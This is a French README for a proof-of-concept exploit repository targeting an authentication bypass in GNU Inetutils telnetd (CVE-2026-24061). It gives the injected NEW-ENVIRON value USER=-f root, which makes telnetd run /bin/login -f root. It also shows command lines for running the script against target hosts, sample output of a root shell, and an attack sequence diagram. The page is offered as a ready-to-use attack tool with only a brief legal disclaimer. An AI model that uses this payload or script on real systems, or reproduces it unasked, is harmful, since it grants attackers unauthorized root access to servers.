
Preuve de concept d'exploitation pour le contournement d'authentification de GNU Inetutils telnetd (CVE-2026-24061) qui ouvre un shell root via une variable USER NEW-ENVIRON spécialement conçue.
Ce dépôt contient un exploit Proof‑of‑Concept pour la vulnérabilité de contournement d'authentification à distance de GNU Inetutils telnetd.
Le problème vient du fait que telnetd ne nettoie pas correctement la variable d'environnement USER reçue via la négociation Telnet NEW‑ENVIRON avant d'invoquer /bin/login.
En fournissant :
USER=-f root
telnetd exécute effectivement :
/bin/login -f root
ce qui contourne l'authentification et ouvre immédiatement un shell root.
Telnet NEW‑ENVIRON permet aux clients de définir des variables d'environnement pendant la négociation de session.
Le telnetd vulnérable transmet USER directement à login :
/bin/login -f "$USER"
Un attaquant définit :
USER=-f root
Résultat :
/bin/login -f root
Le drapeau -f indique à login de sauter l'authentification, accordant un accès root.
Aucune dépendance externe requise.
python3 cve-2026-24061.py 192.168.1.100
python3 cve-2026-24061.py example.com 23
Si vulnérable :
# id
uid=0(root) gid=0(root)
#
Vous disposez maintenant d'un shell root interactif.
python3 cve-2026-24061.py 10.10.10.20
Sortie :
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#
sequenceDiagram
participant A as Attaquant
participant T as telnetd cible
participant L as /bin/login
participant R as Shell root
A->>T: Connexion TCP/23
A->>T: Telnet NEW-ENVIRON USER=-f root
T->>L: Exécuter /bin/login -f root
L-->>T: Contournement d'authentification réussi
T-->>R: Ouvrir un shell root
R-->>A: Session root interactiveCet exploit est fourni pour :
Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas la permission de tester est illégale.